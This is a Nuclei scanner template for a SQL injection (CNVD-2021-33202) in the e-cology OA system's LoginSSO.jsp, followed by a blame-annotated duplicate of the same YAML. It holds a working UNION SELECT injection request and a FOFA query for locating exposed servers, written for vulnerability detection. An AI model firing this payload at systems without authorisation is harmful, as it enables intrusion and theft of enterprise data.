nuclei-templates/http/cnvd/2021/CNVD-2021-33202.yaml

id: CNVD-2021-33202

info:
  name: OA E-Cology LoginSSO.jsp - SQL Injection
  author: SleepingBag945
  severity: high
  description: |
    e-cology is an OA office system specially produced for large and medium-sized enterprises. It supports simultaneous office work on PC, mobile and WeChat terminals. There is a SQL injection vulnerability in Panwei e-cology. An attacker could exploit this vulnerability to obtain sensitive information.
  reference:
    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20LoginSSO.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CNVD-2021-33202.md
    - https://www.cnblogs.com/0day-li/p/14637680.html
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="泛微-协同办公OA"
  tags: cnvd2021,cnvd,e-cology,sqli
variables:
  num: "999999999"

http:
  - raw:
      - |
        GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5({{num}})%20as%20id%20from%20HrmResourceManager HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5(num)}}'

      - type: status
        status:
          - 200
# digest: 4a0a0047304502202c3b8ac764f980a41094f1c98193a9080c65ceaff64975f42b69ef53477bb196022100bb0b3e66abdc94f608aefecaf03255af930789468009df696c1eedb8dff2d283:922c64590222798bb761d5b6d8e72950
completed assigned templates 2023-09-13 11:22:00 +00:00			`id: CNVD-2021-33202`

			`info:`
			`name: OA E-Cology LoginSSO.jsp - SQL Injection`
			`author: SleepingBag945`
			`severity: high`
			`description: \|`
			`e-cology is an OA office system specially produced for large and medium-sized enterprises. It supports simultaneous office work on PC, mobile and WeChat terminals. There is a SQL injection vulnerability in Panwei e-cology. An attacker could exploit this vulnerability to obtain sensitive information.`
			`reference:`
			`- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20LoginSSO.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CNVD-2021-33202.md`
			`- https://www.cnblogs.com/0day-li/p/14637680.html`
			`metadata:`
			`verified: true`
templateman update 2023-10-14 11:27:55 +00:00			`max-request: 1`
completed assigned templates 2023-09-13 11:22:00 +00:00			`fofa-query: app="泛微-协同办公OA"`
auto tagging via templateman 2024-01-14 09:21:50 +00:00			`tags: cnvd2021,cnvd,e-cology,sqli`
completed assigned templates 2023-09-13 11:22:00 +00:00			`variables:`
			`num: "999999999"`

			`http:`
			`- raw:`
			`- \|`
			`GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5({{num}})%20as%20id%20from%20HrmResourceManager HTTP/1.1`
			`Host: {{Hostname}}`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- '{{md5(num)}}'`

			`- type: status`
			`status:`
templateman update 2023-10-14 11:27:55 +00:00			`- 200`
Auto Template Signing [Fri Jan 26 08:31:11 UTC 2024] :robot: 2024-01-26 08:31:11 +00:00			`# digest: 4a0a0047304502202c3b8ac764f980a41094f1c98193a9080c65ceaff64975f42b69ef53477bb196022100bb0b3e66abdc94f608aefecaf03255af930789468009df696c1eedb8dff2d283:922c64590222798bb761d5b6d8e72950`